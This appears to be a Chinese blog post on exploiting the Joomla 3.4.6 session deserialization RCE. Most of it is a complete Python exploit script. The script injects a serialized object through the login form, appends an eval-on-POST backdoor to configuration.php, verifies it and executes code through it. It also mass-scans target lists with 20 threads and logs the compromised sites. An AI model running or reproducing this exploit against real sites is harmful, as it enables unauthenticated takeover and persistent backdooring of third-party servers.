joomla 3.4.6反序列化漏洞利用

0x00 前言

joomla!是一套全球知名的内容管理系统，在此之前，joomla曾爆出过严重的反序列化漏洞CVE-2015-8562,当时，在3.4.6之后的版本中被修复。

Joomla会话作为PHP对象存储在数据库中，并由PHP会话函数处理。这是一个有趣的攻击媒介，因为会话也为未经身份验证的用户存储，因此在那里的对象注入会导致未经身份验证的RCE。此次影响的版本为3.0.0-3.4.6

0x01 漏洞利用

10月7号，关于joomla 3.4.6的反序列化漏洞poc被公布。

环境搭建，joomla 3.4.6下载地址https://downloads.joomla.org/it/cms/joomla3/3-4-6

我在原有脚本的基础上修改了一点进行简单利用，原版可参见https://cn.0day.today/exploit/33327

import requests
from bs4 import BeautifulSoup
import sys
import string
import random
import argparse
from termcolor import colored
import json
import Queue
import threading
 
PROXS = {'http':'127.0.0.1:8080'}
PROXS = {}
 
cmd = 'boogle'
 
def print_info(str):
        print(colored("[*] " + str,"cyan"))
 
def print_ok(str):
        print(colored("[+] "+ str,"green"))
 
def print_error(str):
        print(colored("[-] "+ str,"red"))
 
def print_warning(str):
        print(colored("[!!] " + str,"yellow"))
 
def get_token(url, cook):
        token = ''
        resp = requests.get(url, cookies=cook, proxies = PROXS)
        html = BeautifulSoup(resp.text,'html.parser')
        # csrf token is the last input
        for v in html.find_all('input'):
                csrf = v
        csrf = csrf.get('name')
        return csrf
 
 
def get_error(url, cook):
        resp = requests.get(url, cookies = cook, proxies = PROXS)
        if 'Failed to decode session object' in resp.text:
                #print(resp.text)
                return False
        #print(resp.text)
        return True
 
 
def get_cook(url):
        resp = requests.get(url, proxies=PROXS)
        #print(resp.cookies)
        return resp.cookies
def make_req(url , object_payload):
        # just make a req with object
        #print_info('Getting Session Cookie ..')
        cook = get_cook(url)
        #print_info('Getting CSRF Token ..')
        csrf = get_token(url, cook)
 
        user_payload = '\\0\\0\\0' * 9
        padding = 'AAA' # It will land at this padding
        working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
        clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
 
        inj_object = '";'
        inj_object += object_payload
        inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
        password_payload = padding + inj_object

        params = {
            'username': user_payload,
            'password': password_payload,
            'option':'com_users',
            'task':'user.login',
            csrf :'1'
            }
 
        #print_info('Sending request ..')
        resp  = requests.post(url, proxies = PROXS, cookies = cook,data=params)
        return resp.text
 
def get_backdoor_pay():
        # This payload will backdoor the the configuration .PHP with an eval on POST request 
        function = 'assert'
        template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'

        payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + cmd +'\\\'])) eval($_POST[\\\''+cmd+'\\\']);\', FILE_APPEND) || $a=\'http://xxx\';'
        #print(payload)
        function_len = len(function)
        final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
        return final
 
def ping_backdoor(url,param_name):
        res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
        if 'PWNED' in res.text:
                return True
        return False
 
def execute_backdoor(url, payload_code):
        # Execute PHP code from the backdoor
        res = requests.post(url + '/configuration.php', data={cmd:payload_code}, proxies = PROXS)
        print(res.text)
 
def exploit(url):

        target_url = url + '/index.php/component/users'
        try:
            make_req(target_url, get_backdoor_pay())
        except:
            print_warning('exploit error,no index.php/component/users')
 
        try:
            if ping_backdoor(url, cmd):
                    print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + cmd)
                    file_write('joomla_vulu_site.txt',url+"\n")
                    
            else:
                print_error(url +' is not vuluable')
        except:
            print_warning('ping_backdoor error')

class Bruter(object):
    def __init__(self, urls,threads):

        self.vb_urls = Queue.Queue()
        self.threads = threads
        for u in urls:
            self.vb_urls.put(u[0])
        #print self.vb_urls.get()
    def vb5_rce(self):
        with threading.Lock():
            while self.vb_urls.qsize() > 0:

                target = self.vb_urls.get()
                if 'http' not in target:
                    target = 'http://'+target
                exploit(target)

    def run(self):
        for i in  range(self.threads):
            print '[+] thread '+ str(i)
            t = threading.Thread(target=self.vb5_rce)
            t.start()
def get_url():
    with open('joomla.txt','r')  as f:
        r = json.loads(f.read())
        urls = r['results']
        return urls
        
def file_write(name,results):
    with open(name,mode='a') as file:
        file.write(results)

if __name__ == '__main__':
    urls = get_url()
    vb5_rce = Bruter(urls=urls,threads=20)
    vb5_rce.run()